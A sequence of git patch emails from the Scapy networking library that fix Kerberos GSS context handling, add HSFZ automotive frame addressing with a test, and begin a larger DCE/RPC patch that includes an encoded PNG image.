if not self.KEY: raise ValueError("Missing KEY attribute") + now_time = datetime.now(timezone.utc).replace(microsecond=0) + # If using a UPN, require U2U if self.UPN and ap_req.apOptions.val[1] != "1": # use-session-key # Required but not provided. Return an error Context.U2U = True - now_time = datetime.now(timezone.utc).replace(microsecond=0) err = KRB_GSSAPI_Token( innerToken=KRB_InnerToken( TOK_ID=b"\x03\x00", @@ -4863,7 +4864,6 @@ def GSS_Accept_sec_context( tkt = ap_req.ticket.encPart.decrypt(self.KEY) except ValueError as ex: warning("KerberosSSP: %s (bad KEY?)" % ex) - now_time = datetime.now(timezone.utc).replace(microsecond=0) err = KRB_GSSAPI_Token( innerToken=KRB_InnerToken( TOK_ID=b"\x03\x00", From 254c970123b434b02009bb38b2d8f16148b79212 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 25 Jun 2025 14:15:26 +0200 Subject: [PATCH 1497/1632] Kerberos: GSS_Passive. Handle bad SPN case (#4775) --- scapy/layers/kerberos.py | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 5c6a0c687e1..bd7d46f4631 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -4039,6 +4039,7 @@ class STATE(SSP.STATE): CLI_SENT_APREQ = 3 CLI_RCVD_APREP = 4 SRV_SENT_APREP = 5 + FAILED = -1 class CONTEXT(SSP.CONTEXT): __slots__ = [ @@ -4982,12 +4983,18 @@ def GSS_Passive(self, Context: CONTEXT, token=None): if Context.state == self.STATE.INIT: Context, _, status = self.GSS_Accept_sec_context(Context, token) - Context.state = self.STATE.CLI_SENT_APREQ - return Context, GSS_S_CONTINUE_NEEDED + if status == GSS_S_CONTINUE_NEEDED: + Context.state = self.STATE.CLI_SENT_APREQ + else: + Context.state = self.STATE.FAILED + return Context, status elif Context.state == self.STATE.CLI_SENT_APREQ: Context, _, status = self.GSS_Init_sec_context(Context, token) return Context, status + # Unknown state. Don't crash though. + return Context, GSS_S_FAILURE + def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): if Context.IsAcceptor is not IsAcceptor: return From bd7f2a3f296f7b8caba12b2e683985b5f1e70bc0 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Thu, 26 Jun 2025 07:57:15 +0200 Subject: [PATCH 1498/1632] hsfz: incorrect_tester_address packets have addressing. (#4771) --- scapy/contrib/automotive/bmw/hsfz.py | 7 ++++--- test/contrib/automotive/bmw/hsfz.uts | 8 ++++++++ 2 files changed, 12 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 8eb49f7a1e1..b474abfd071 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -70,11 +70,12 @@ class HSFZ(Packet): def _hasaddrs(self): # type: () -> bool - # Address present in diagnostic_req_res, acknowledge_transfer and - # two byte length alive_check frames. + # Address present in diagnostic_req_res, acknowledge_transfer, + # two byte length alive_check and incorrect_tester_address frames. return self.control == 0x01 or \ self.control == 0x02 or \ - (self.control == 0x12 and self.length == 2) + (self.control == 0x12 and self.length == 2) or \ + self.control == 0x40 def _hasidstring(self): # type: () -> bool diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index 479608babec..c47edc4bdf5 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -124,6 +124,14 @@ assert pkt.source == 0x00 assert pkt.target == 0xf4 += Dissect incorrect tester address +pkt = HSFZ(bytes.fromhex("000000020040fff4")) +assert pkt.length == 2 +assert pkt.control == 0x40 +assert pkt.source == 0xff +assert pkt.target == 0xf4 + + = Test HSFZSocket server_up = threading.Event() From 50edac99aa83506b2e557e91956aa0e71d92763b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 7 Jul 2025 00:25:28 +0200 Subject: [PATCH 1499/1632] DCE/RPC & Kerberos fixes (#4783) * UTscapy: better -i mode * main: allow mybanneronly * Rework: embeded pointers in DCE/RPC + passive kerberos * Document MS-EERR * Improve test for MSEERR --- doc/scapy/graphics/dcerpc/debug_eerr.png | Bin 0 -> 75332 bytes doc/scapy/layers/dcerpc.rst | 15 + scapy/layers/dcerpc.py | 89 +- scapy/layers/kerberos.py | 33 +- scapy/layers/msrpce/all.py | 1 + scapy/layers/msrpce/msdcom.py | 65 +- scapy/layers/msrpce/mseerr.py | 656 ++++++++++ scapy/layers/msrpce/mspac.py | 75 +- scapy/layers/msrpce/raw/ept.py | 43 +- scapy/layers/msrpce/raw/ms_dcom.py | 30 +- scapy/layers/msrpce/raw/ms_drsr.py | 43 +- scapy/layers/msrpce/raw/ms_nrpc.py | 12 +- scapy/layers/msrpce/raw/ms_samr.py | 36 +- scapy/layers/msrpce/raw/ms_srvs.py | 1388 +++++++++++++++++++++- scapy/layers/msrpce/raw/ms_wkst.py | 197 ++- scapy/layers/msrpce/rpcclient.py | 7 +- scapy/layers/ntlm.py | 2 +- scapy/layers/spnego.py | 7 +- scapy/main.py | 17 +- scapy/tools/UTscapy.py | 19 +- test/scapy/layers/dcerpc.uts | 208 ++-- 21 files changed, 2537 insertions(+), 406 deletions(-) create mode 100644 doc/scapy/graphics/dcerpc/debug_eerr.png create mode 100644 scapy/layers/msrpce/mseerr.py diff --git a/doc/scapy/graphics/dcerpc/debug_eerr.png b/doc/scapy/graphics/dcerpc/debug_eerr.png new file mode 100644 index 0000000000000000000000000000000000000000..4f078c8b9f23932ab8c9a27f3d114115d87db051 GIT binary patch literal 75332 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 